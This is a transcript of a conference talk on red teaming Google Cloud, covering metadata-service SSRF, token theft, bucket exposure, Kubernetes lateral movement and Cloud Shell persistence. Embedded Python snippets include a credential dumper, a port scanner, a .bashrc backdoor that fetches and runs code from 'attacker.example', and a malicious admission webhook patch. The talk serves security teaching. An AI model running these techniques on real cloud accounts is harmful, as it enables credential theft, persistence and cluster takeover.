Take a seat. It is my pleasure to introduce Bryce, who will be talking about "May the Cloud Be with You: Red Teaming GCP." I'll let him take it away. Oh, and real quickly, a slight announcement: if you're doing the skydiving, see registration today at 1 PM to sign up for a time slot. Back to you.

Thanks, appreciate that. All right, I'm Bryce. This is my Twitter handle, tweakfox. If you want the slides, I'll throw up a link to them right after this, so check it out on Twitter. We're going to be talking about GCP today: the basics of how you would red team inside the environment, plus some cool little nuances that you may or may not already know about on the platform.

So who am I? I'm Bryce. I used to work at Homeland Security, where I led incident response and forensics operations for the unclassified SOC, which is basically hunting down APTs. Then I worked at NSA for a while as a technical director over a very specific offensive unit. After that I was at Adobe, where I built out a red team for their Digital Experience business unit in Utah. That's where I physically reside now, near Salt Lake City. Great skiing out there. Now I lead Stage 2 Security; we're a small boutique firm, about 25 people, and we do a lot of pen testing, tool dev, and stuff like that. Also, I run BSides Salt Lake City, the nonprofit. So if you guys want to come ski in March, it's usually still pretty good.

All right, GCP overview. Because it's only 25 minutes, I ripped out most of the overview, so this is a crash course in cloud. If you're an admin and you log in via the website, you're logging into the management UI; that's console.cloud.google.com. If you're using CLI-type tools, you're going to talk directly to the Control Plane APIs.
Anytime you're clicking anything inside the website for GCP, that's just calling the Control Plane APIs below it. And as you create resources or services, the Control Plane reaches out to the Data Plane and spins those up. So if you have any automation processes or a CI/CD pipeline, those generally just talk to the Control Plane APIs, which then spin up the services in the Data Plane. Typical services in the Data Plane would be a load balancer, then some type of compute like a virtual machine, and then storage. Cloud providers are constantly innovating in this space, and they have an array of different services; it would be hard to be an expert in all of them. But most people using the cloud are at least using these basics.

All right, let's dig into Compute Engine, which is basically virtual machines on the GCP platform. A vulnerability that's really interesting in the cloud space is the server-side request forgery (SSRF). Typically, you'd have a web application hosted on a virtual machine. Back in the day, this was inside a data center and you had a nice thick internet-facing data center firewall: you could get to the web server, but you couldn't necessarily get to any of the other surrounding servers inside the target network. In this example here, we have an application where a user would request the /app URI and pass a GET parameter for b.jpeg. The web app processes that request, says "oh, they want b.jpeg, that's over here on this other server that's internal only," makes a request out to it, grabs the content, and feeds it back to the user. That's the typical way the web app would work.
Now, if the web application isn't checking inputs, it might be vulnerable to a server-side request forgery: an attacker could replace the image value in the GET parameter with another server internal to the data center, and maybe retrieve back some data they shouldn't be able to access. For example, if there's a monitoring server on the internal network, like a Nagios or something, maybe they could pull some type of stats page off of it. It's a vulnerability, but it's typically not going to lead to a full compromise of the whole data center.

Fast-forward to cloud: SSRFs in the cloud are deadly. When you spin up your VM in the cloud, the control plane needs a way to communicate certain data to the data plane about what it should be doing. For example, when you boot a VM, maybe you want it to execute a boot script, as in "run this bash script when you boot up." How is the control plane going to tell the data plane to do that? It takes that boot script and puts it inside the metadata service, which is a RESTful API the VM can call out to. When the VM initially boots, it calls out to that RESTful API, which is internal-only to it, kind of like a fabric IP, and runs the bash script. There is an RFC spec on metadata services, but each vendor's implementation varies greatly from it. Generally, though, it's always on that 169.254.169.254 IP address. And the big thing here: credentials for GCP services can be stored in that metadata service, which makes them accessible via a server-side request forgery vulnerability. On GCP specifically, there's a nice FQDN, metadata.google.internal, that just resolves to that 169 IP; on the other platforms, Azure and AWS, that doesn't exist as far as I know.
All right, so let's say you have a server-side request forgery in a web application running on top of GCP, and you redirect it to the metadata service. You might see back an error message like this: 403 Forbidden. Why? Because Google has implemented additional protections to prevent SSRF vulnerabilities from being able to access the metadata service. Namely, you have to set an extra HTTP header to access it (on GCP, that's Metadata-Flavor: Google). This applies to Azure and GCP for most of what you can query via their metadata services. It does not apply to AWS; there's no HTTP header requirement on the AWS platform right now. So we're the attacker, and now we're sad because we can't get the creds out of the metadata service to interact with the control plane.

But there's kind of a loophole in GCP. If you look up the docs about it, it says deprecated and will be removed, but it still works. I mean, I tried this last week, and it still works; I don't know what their timeline is for deprecating it. Basically, if you use the /v1beta1 endpoint, not all the same features are there, but most of the ones you want are, like the credentials. You just call that, and you don't need to pass the metadata HTTP header. And now you're happy as a panda.

For example, here's a sweet lizard website. In it, there's a request for an external image: the GET parameter p points to some external JPEG stored in an S3 bucket somewhere. So we just modify that GET parameter p to point to the metadata server's FQDN, or you could use the 169.254 IP address, with the /v1beta1 URI. And what you get returned is this bearer token right here, the access token.
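To make the two endpoints concrete, here's a minimal sketch. It only builds the URLs and headers (no network calls), and the service-account token path matches the one shown on the slide; the point is that v1 enforces the Metadata-Flavor header while the deprecated v1beta1 endpoint does not, which is exactly what makes it reachable through an SSRF where you usually can't control headers.

```python
# Sketch of the GCP metadata endpoints discussed above. The current v1
# endpoint requires the Metadata-Flavor: Google header; the deprecated
# v1beta1 endpoint does not, so it works through a plain SSRF.
METADATA_HOST = "http://metadata.google.internal"  # also 169.254.169.254

def metadata_request(path, legacy=False):
    """Return the (url, headers) pair needed to fetch a metadata path."""
    version = "v1beta1" if legacy else "v1"
    url = f"{METADATA_HOST}/computeMetadata/{version}/{path}"
    # Only the non-legacy endpoint enforces the header check.
    headers = {} if legacy else {"Metadata-Flavor": "Google"}
    return url, headers

# The default service account's token, as in the example above:
url, headers = metadata_request("instance/service-accounts/default/token",
                                legacy=True)
# An SSRF payload is then just ?p=<url>, with no extra headers required.
```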
That access token is what you need to start authenticating to the GCP control plane with the same rights the VM is running as inside the cloud provider. Generally, you'll take that access token and query this Google APIs endpoint right here. It's going to tell you, one, yes, that token works; and two, the scope of the token. This is incredibly nice, because it actually tells you what you can use the token to do inside the GCP account. Versus on AWS, where you might get access to a token but then a lot of times have to blindly guess what it can access inside the environment.

If we try to use that token to spin up another VM, by default it sends back this message: insufficient permissions. So let's look into why we don't have rights to do that. If we go to the Web Management Console as an admin, go over to the Compute Engine service, and go to spin up a new VM, we'll see there's a block there for "Identity and API access." One of the cool parts about GCP is that you can actually specify what the access token inside the metadata service will have access to, which is a little different from the way it operates on Azure and AWS. "Allow default access": if they pick that, it's not going to let us spin up VMs; we'll look at that more in a second. They could also pick "Set access for each API," which lets them say, hey, I want this box to be able to talk to BigQuery or some other GCP service. By default, these are the services you can query. You can see Compute Engine is disabled, so you cannot spin up more VMs if you steal creds this way. We'll come back around to this in a second. And then there's that middle option, full access.
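The token-checking step above can be sketched like this. The endpoint is Google's public OAuth2 tokeninfo API; the JSON here is a trimmed example of the response shape for illustration, not real output.

```python
import json
from urllib.parse import urlencode

def tokeninfo_url(access_token):
    # Google's public endpoint for validating a token and listing its scopes.
    return ("https://www.googleapis.com/oauth2/v1/tokeninfo?"
            + urlencode({"access_token": access_token}))

# Trimmed example of the response shape (illustrative, not real output):
sample = json.loads(
    '{"scope": "https://www.googleapis.com/auth/devstorage.read_only",'
    ' "expires_in": 3599}'
)

# The scope field tells you exactly what the stolen token can touch:
# here, read-only storage access but no compute scope.
scopes = sample["scope"].split()
```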
If full access was selected when the VM was spun up, then yes, those credentials can totally be used to spin up more VMs inside the environment under the attacker's control. So it really depends on the permissions set around the VM when it's booted up. There are some scripts on this GitHub for just those requests I showed you. You don't really need to use them; I put them there more for documentation purposes.

All right, cool. Let's look at storage. There have been a ton of cloud storage breaches out there; this is just from a small six-month period. We see names like Accenture, Verizon, Time Warner Cable, Dow Jones, and DJI, all using storage accounts in cloud providers without properly securing them. There's a cool project out there called buckets.greyhatwarfare.com where they go and index all these public buckets so you can search through them. I'm not sure about the legality of it, but it's a cool idea.

Basically, in the cloud space there are two permission settings you want to watch out for on the GCP and AWS platforms. allUsers means public. And allAuthenticatedUsers sounds like only people in your GCP account would be able to get to the files, resources, and objects in the buckets, but what it actually means is anybody with any GCP account can get to them. That tripped a lot of people up on the AWS platform specifically. The cloud providers have made changes in the last year or so to the storage account interfaces to make it a lot harder to make objects public, which is positive from a defense side, but you'll still see stuff set up incorrectly. Generally speaking, storage on GCP is pretty uniform: it's storage.googleapis.com, then a globally unique bucket name, and then the object or file name here. You can set buckets listable, too. And this is not a typo: the top of the listing really does reference the Amazon S3 spec. That's just the way GCP does it.
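A quick sketch of that uniform URL layout, plus a helper for reading the status codes you'd see when probing buckets anonymously. No network calls here, and the status-code mapping is my own rough heuristic rather than anything documented:

```python
# GCS object URLs follow the uniform layout described above:
# storage.googleapis.com / <globally unique bucket> / <object name>.
def object_url(bucket, obj):
    return f"https://storage.googleapis.com/{bucket}/{obj}"

def interpret_status(code):
    # Heuristic only: 200 means readable by allUsers (public),
    # 403 means the bucket/object exists but isn't public,
    # 404 means no such bucket or object.
    return {200: "public", 403: "exists-private", 404: "missing"}.get(
        code, "unknown")
```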
And you could brute-force object or bucket names using a tool like GoBuster, just like you would on any web engagement.

OK, one thing I just wanted to highlight real quickly: if you spin up a VM with the default settings and look under Storage, it says you have read-only access to storage by default. What does that actually mean? Well, there's this concept in GCP of a project, and almost everything in GCP is segmented at the project level. You have an organization; you'll want to create a folder underneath it, even if you don't use the folder; and then you'll want to create projects underneath that folder. So if you get the credentials out of the metadata service and there's storage inside that same project, even if it requires authentication, you'll be able to read the objects in that storage account. That's a good way to expand access.

OK, we've got a few minutes left, so I'm going to talk about Kubernetes. Basically, the scenario we've got here is a container running a web app with some vulnerability in it that enables remote code execution. In the demo screenshots you might see me load up the Voodoo tool, which is our cross-platform post-exploitation tool. Then we'll see what damage could be done inside the cluster, or how you would expand access from there. This is really looking at GKE, Google Kubernetes Engine, specifically. There are a lot of different Kubernetes implementations out there, and this is just the default setup as of 30 days ago.

OK, cool. So you've exploited the web app; as the attacker, how would you even know you're inside a container? One way is to cat /proc/1/cgroup, and you can see in the listing that it says kubepods, so this is a Kube pod, right? If Docker's in use, you could ls -a the root directory, and generally you'll see the hidden .dockerenv file.
The other one is, if you do a ps, a process list on the box, you'll see that PID 1 looks weird. It doesn't look like init or launchd, which are typically the first processes started up on Linux and Mac systems. For example, here's a typical case where you'd see a Flask web app as PID 1. So you know you're inside a container environment.

OK, probably no secret here if you're familiar with Kubernetes, but there are creds stored at this location right here on disk (/var/run/secrets/kubernetes.io/serviceaccount/token). If you can read that, you can start authenticating to the Kubernetes API. One thing to keep in mind is that Kubernetes on GCP just creates instances under Compute Engine. So even if you only have access to a container, by default you can redirect and talk to the metadata service just like we saw in the past example, grab those creds, and start using them at the GCP level. Here's an example where we load up a Python script and pull creds out of the metadata service, getting back that access token.

One thing that's kind of interesting: as part of the bootstrapping process on the GCP platform, there's a kube-env value set inside the metadata service. This is used when worker nodes are initially being bootstrapped, and you can pull credentials out of it. There's a little more work you need to do to use those to talk to the Kubernetes API; you can check out the references at the bottom of this slide, and I'll post the slides on my Twitter account for you guys. But you go through a couple of steps, and then you can authenticate to the API and potentially spin up more pods inside the cluster.

All right, another way you can expand access if you get into a container: by default, there's really no enforcement of network boundaries. You'd have to implement something like Istio or Cilium inside the cluster to get that.
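The container checks from a moment ago can be sketched as small pure functions. The inputs are passed in as arguments so the sketch runs off-box; on a real target you'd read /proc/1/cgroup and list / yourself.

```python
def looks_like_kube_pod(cgroup_text):
    # /proc/1/cgroup inside a GKE pod typically mentions "kubepods".
    return "kubepods" in cgroup_text

def has_dockerenv(root_listing):
    # Docker drops a hidden /.dockerenv file in the container's root.
    return ".dockerenv" in root_listing

def weird_pid1(pid1_name):
    # A PID 1 that isn't init/systemd/launchd (say, a Flask app)
    # is a strong hint you're in a container.
    return pid1_name not in ("init", "systemd", "launchd")
```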
With no enforced network boundaries, a compromised pod can talk to the kubelet service on other nodes over these TCP ports (10250 and 10255). So here's a Python script that I load up into memory only, to scan for the ports, and then another Python script where we just access them to list out what pods are running on the other worker nodes inside the cluster.

Container security is really just Linux kernel security, and if you don't take anything else away from here, hopefully you'll take that away. There was a vulnerability earlier this year, the runC vulnerability (CVE-2019-5736), that would allow you to break out of the container and get code running on the host. But the Dirty COW exploit from a number of years ago would also do the same thing. That's typically an exploit used to escalate from user to root on a Linux system, but it also has the capability to break you out of a container. So container security is really just Linux kernel security. You can use seccomp or some other controls to try to restrict which kernel API calls can be made from the container, but yeah, for the most part that's the story.

A common thing you'll see a lot if you search for Kubernetes hacking: after gaining some type of credentials, they talk to the API and deploy another pod whose container has the root file system mounted. This may or may not work in your target environment, depending on its security posture. Another thing to be aware of at a high level: they're constantly rolling features into Kubernetes, and most of that code is accessible via this API here, so some of that code is going to have vulnerabilities. In 2018, there was a vulnerability in the API (CVE-2018-1002105) that enabled you to bypass all authentication and authorization. Basically, if you could just talk to the Kubernetes API, you could do anything inside the cluster.
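A minimal version of that in-memory port scan might look like the following. Host and ports are parameters, so nothing here is GKE-specific; the worker-node address in the usage comment is made up.

```python
import socket

def open_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    found = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            # connect_ex returns 0 on a successful connection.
            if s.connect_ex((host, port)) == 0:
                found.append(port)
        finally:
            s.close()
    return found

# Usage against another worker node in the cluster (address is made up):
# open_ports("10.128.0.5", [10250, 10255])
```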
One more thing to note: technically you have something managing the containers on the worker nodes, like Docker, so if it were misconfigured with an unprotected TCP socket, you could move laterally that way too. Okay, great.

So we talked a little bit about breaching these environments from the server side, coming in from the internet. I just wanted to talk a little about breaching from the client side: trying to get access to the engineers' or cloud admins' laptops. This may or may not be applicable to you, but a lot of tech companies use Mac endpoints. There was a recent vulnerability in Excel on Mac that would basically allow you to get code execution via an XLM macro; that just came out last month or this month. And prior to that, I don't know if you guys know Patrick Wardle, but he has a lot of really good research up on his blog, Objective-See, if you're interested in Mac exploitation; there are links in the references. Basically, if you can take advantage of a vulnerability like that XLM one, you can get code execution on a laptop.

And if you get code execution on a laptop where they're using the CLI for GCP, the CLI will have created this .config/gcloud folder, and you'll see some files underneath it that look like this. The one that says access_tokens.db looks pretty good. If we start checking that out, we realize it's just a SQLite database, and if we extract the data out of it, we get a token that lets us authenticate to the GCP control plane in the context of whatever that admin can do from his laptop. Also of note: inside that same database, there's a list of the scopes those credentials can access. That's nice from an exploitation standpoint; you can see how valuable they are pretty quickly. And then another thing I just want to highlight is cookies.
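The extraction step above is a couple of lines of SQLite. The table and column names used here (access_tokens, account_id, access_token) are an assumption about the gcloud SDK's schema; check it first with `sqlite3 access_tokens.db .schema` before relying on them.

```python
import sqlite3

def dump_tokens(db_path):
    """Pull (account, token) pairs out of a gcloud access_tokens.db file.

    The real file lives under ~/.config/gcloud/. Table/column names are
    assumed; inspect the schema on your target copy first.
    """
    conn = sqlite3.connect(db_path)
    try:
        return conn.execute(
            "SELECT account_id, access_token FROM access_tokens").fetchall()
    finally:
        conn.close()
```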
A lot of the admins aren't even installing the CLIs on their laptops anymore, and I'll show you why in a second, but they still authenticate using their browsers. There's a cool technique, Cookie Crimes; if you haven't checked it out, you should. You can exfiltrate their cookies and replay them to jump into their browser sessions. When you're inside GCP, and a few of the other cloud providers have copied this, there's a Cloud Shell. This is really popular with SREs and cloud admins now, because they don't have to install anything on their laptop. They just log in with their browser, click this button in the upper right-hand corner, a containerized environment gets deployed, and they can run all their commands from that containerized environment. So that's cool.

The first thing to note from an offensive standpoint: let's say I steal someone's cookies and am somehow able to access the GCP environment. That access is not going to last long, right? So I want to persist some way. I thought about this in the context of the Cloud Shell because I see it in use a lot now. And you'll see right there, it says your home directory will persist across sessions. From an attacker's standpoint, that sounds pretty great. So what if we make a slight modification, old-school style: we backdoor the .bashrc to load up our tool whenever they load this environment. Does that actually work? Can we get a callback out of the Cloud Shell environment? And the answer is yes: we get a callback every time they click that button and the .bashrc gets loaded, out to our LP where our red teaming software is. From there, we have the same level of access the admin does inside the Cloud Shell.

Two minutes. Okay, so there's some really cool Twitter chatter, is that the right term, on how to get outside of that shell, because that shell's kind of a container.
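The .bashrc backdoor described above amounts to appending one line to the persistent home directory. A minimal sketch, where the implant URL is obviously a placeholder for your own LP:

```python
import os

# One-liner that gets executed on every new Cloud Shell session.
# The URL is a placeholder, not a real endpoint.
PAYLOAD = "curl -s https://attacker.example/implant.sh | bash"

def backdoor_bashrc(home=None):
    """Append the payload line to <home>/.bashrc and return the path."""
    path = os.path.join(home or os.path.expanduser("~"), ".bashrc")
    with open(path, "a") as f:
        f.write("\n" + PAYLOAD + "\n")
    return path
```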
You can get to the host below the shell's container just by running that command at the top. So I did that, and from there you can access the metadata service from the host, but there's not really much you can reach from there, so that's kind of mostly a dead end. From a persistence standpoint, though, I did notice that when you're on the host below that container, you can store files in /tmp, and they have a few other writable mount points, and those seem to persist at least for a moderate amount of time. So that's kind of cool, maybe a little covert-store-type system if you were using this in real life.

All right, one minute left. Okay, last thing. When a pod or anybody else goes to authenticate to the API, what really happens under the hood? You get authentication (authn), then authorization (authz), making sure you're allowed to do what you're doing. And then there's this newer thing called admission control. What does admission control do? Really useful things, like validating that what you're trying to deploy inside the cluster isn't doing anything bad from a security standpoint, for example mounting the host's root file system, things like that. But what I noticed is that, because they didn't want to make you code everything inside of that, you can reach out to an external admission controller. So imagine you get some type of privileged access inside the Kubernetes cluster and you write an evil external admission controller: you could mutate deployments as they move into the cluster. This is a newer thing, still alpha/beta, so you may not see it in production, but I definitely feel like this is the way the industry is moving.

And with that being said, I'm Bryce. If you want to talk more, I'll be hanging out outside. I know I went through a lot quickly, but thank you guys for listening.
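As a footnote on that evil-admission-controller idea: a mutating webhook answers an AdmissionReview with a base64-encoded JSONPatch. The sketch below builds a response that injects a hostPath mount of the node's root filesystem into whatever pod is being admitted. The field names follow the AdmissionReview v1 shape, but treat the exact patch paths as an assumption; they depend on the pod spec being admitted.

```python
import base64
import json

def evil_admission_response(uid):
    """Build a mutating-webhook response that bolts a hostPath volume
    (the node's /) onto the admitted pod. Illustrative sketch only."""
    patch = [
        {"op": "add", "path": "/spec/volumes/-",
         "value": {"name": "hostroot", "hostPath": {"path": "/"}}},
        {"op": "add", "path": "/spec/containers/0/volumeMounts/-",
         "value": {"name": "hostroot", "mountPath": "/host"}},
    ]
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": uid,                 # must echo the request's uid
            "allowed": True,            # admit the object...
            "patchType": "JSONPatch",   # ...but mutate it on the way in
            "patch": base64.b64encode(json.dumps(patch).encode()).decode(),
        },
    }
```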